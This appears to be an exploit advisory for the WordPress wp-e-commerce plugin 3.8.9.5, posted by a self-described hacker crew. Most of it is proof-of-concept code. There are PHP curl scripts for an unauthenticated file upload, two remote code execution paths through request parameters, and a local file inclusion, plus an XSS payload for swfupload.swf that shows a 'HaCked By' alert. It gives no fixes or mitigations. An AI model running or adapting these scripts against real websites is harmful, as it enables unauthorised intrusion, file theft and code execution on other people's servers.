WordPress E-Commerce 3.8.9.5 File Upload / XSS / CSRF / Code Execution

2014.01.24
Credit: KedAns-Dz
Risk: High
Local: No
Remote: Yes


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright &#169; 2014 | Dz Offenders Cr3w ]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ###################################################################### # # [>] Title : Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : File Upload , Code Exec , File Include , Cross-Site Scripting , Object Inject # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [>] ^_^ Greetings to 1337day Users/FAN's and Owners <3 *_* , i'm leaving 1337day # [-] F-ck Hacking , LuV Exploiting .. Penetration-Testing rouls # ###################################################################### ##====[ PoC(1) : File Upload ]================================ # # - CWE : CWE-616 , CWE-434 # # <?php # /* # - file : save-data.functions.php # - lines : 486.. 504 # # line : 500 # # move_uploaded_file( $_FILES['image']['tmp_name'], $new_image_path ); # # */ # # $headers = array("Content-Type: application/octet-stream", # "Content-Disposition: form-data; name=\"image\"; file=\"k3d.gif\""); # gif name ! # # $uploadfile="KedAns-Dz TesT !"; # U'r file content h3re ! # # $ch = curl_init("http://[Target]/[path]/wp-e-commerce/wpsc-admin/includes/save-data.functions.php"); # curl_setopt($ch, CURLOPT_POST, true); # curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); # curl_setopt($ch, CURLOPT_POSTFIELDS, array('image'=>"@$uploadfile")); # curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); # curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); # $postResult = curl_exec($ch); # curl_close($ch); # print "$postResult"; # ?> # ##====[ PoC(2) : Remote Code ExeC ]=========================== # # - CWE : CWE-94 # # <?php # /* # - file : ajax.php # - lines : 38 , 41 , 57 # # $callback = "_wpsc_ajax_{$ajax_action}"; # call_user_func $result = call_user_func($callback); # $ajax_action = str_replace('-', '_', $_REQUEST['wpsc_action']); # # */ # # $ch = curl_init(); # curl_setopt($ch, CURLOPT_URL, "http://[Target]/[path]/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD]"); # curl_setopt($ch, CURLOPT_HTTPGET, 1); # curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); # curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); # $buf = curl_exec ($ch); # curl_close($ch); # unset($ch); # echo $buf; # ?> # ##====[ PoC(3) : Remote Code ExeC ]=========================== # # - CWE : CWE-94 # # <?php # /* # - file : display-sales-logs.php # - line : 23 # # $controller = $_REQUEST['c']; # # */ # $ch = curl_init(); # curl_setopt($ch, CURLOPT_URL, "http://[Target]/[path]/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD]"); # curl_setopt($ch, CURLOPT_HTTPGET, 1); # curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); # curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); # $buf = curl_exec ($ch); # curl_close($ch); # unset($ch); # echo $buf; # ?> # ##=====[ PoC(4) Local File Include ]========================== # # - CWE : CWE-98 # # <?php # /* # - file: misc.functions.php # - lines : 280 .. 355 # # * multiple bug in function imagecreatefromgif() , you can use any param's to exploit it. # # * param's : [ image_name , category_id , wpsc_request_image , productid , image_id ] # # */ # # $ch = curl_init(); # curl_setopt($ch, CURLOPT_URL, "http://[Target]/[path]/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=[LFI/LFD]"); # curl_setopt($ch, CURLOPT_HTTPGET, 1); # curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); # curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); # $buf = curl_exec ($ch); # curl_close($ch); # unset($ch); # echo $buf; # ?> # ##====[ PoC(5) Remote XSS/XSRF ]============================== # # - http://1337day.com/exploit/20517 # - CVE :CVE-2012-2399 , CVE-2012-3414 # - CWE : CWE-352 # # JS alert() Code : %22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28%27HaCked%20By%20KedAns-Dz%27%29;// # # http://[Target]/[path]/wp-e-commerce/wpsc-core/js/swfupload/swfupload.swf?movieName=[ JS Code ] # http://[Target]/[path]/wp-e-commerce/wpsc-core/js/swfupload/swfupload.swf?buttonImageURL=[ Object/Image URL ] # ############################################################### #### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )= ####


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top